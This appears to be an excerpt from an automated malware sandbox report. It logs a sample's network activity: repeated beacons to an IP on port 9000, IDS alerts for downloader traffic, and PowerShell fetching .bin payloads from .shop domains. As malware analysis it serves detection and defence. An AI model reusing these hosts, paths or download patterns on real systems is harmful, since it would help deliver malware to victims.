Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000
Source: global traffic	HTTP traffic detected: GET /wbinjget?q=0CAE766850B2702DDB609BB03263B071 HTTP/1.1Host: 92.255.57.75:9000

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 188.114.97.6 188.114.97.6
Source: Joe Sandbox View	IP Address: 188.114.97.6 188.114.97.6

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49819 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49821 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49827 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49814 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49832 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49846 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49853 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49851 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49859 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49840 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49879 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49872 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49880 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49864 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49892 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49898 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49899 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49886 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49838 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49943 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49866 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49905 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49917 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49918 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49956 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49911 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49969 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49962 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49988 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49949 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49982 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49997 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49924 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49931 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49950 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50016 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49975 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49964 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49981 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50021 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50014 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49994 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50027 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50035 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50041 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50047 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49937 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:49930 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50048 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50050 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50049 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50029 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50053 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50008 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50052 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50054 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50055 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50002 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50051 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50057 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50058 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50060 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50056 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50059 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50061 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50065 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50066 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50067 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50068 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50069 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50070 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50071 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50072 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50073 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50074 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50075 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50076 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50077 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50078 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50079 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50080 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50081 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50082 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50083 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50085 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50087 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50088 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50089 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50091 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50090 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50092 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50093 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50063 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50094 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50096 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50097 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50098 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50100 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50101 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50102 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50103 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50104 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50105 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50106 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50108 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50110 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50111 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50112 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50099 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50113 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50114 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50115 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50116 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50117 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50120 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50122 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50123 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50121 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50124 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50125 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50127 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50128 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50129 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50130 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50119 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50134 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50133 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50136 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50135 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50084 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50086 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.11:50132 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49772 -> 188.114.97.6:443

Source: global traffic	HTTP traffic detected: GET /3VKKE.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: static.klipxuhaq.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/7552973650/u.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cndef1.green-pathways.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/uz/7552973650/nnn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cndef1.green-pathways.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.75

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_003829BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

20_2_003829BA

Source: global traffic	HTTP traffic detected: GET /3VKKE.mp4 HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: static.klipxuhaq.shopConnection: Keep-Alive
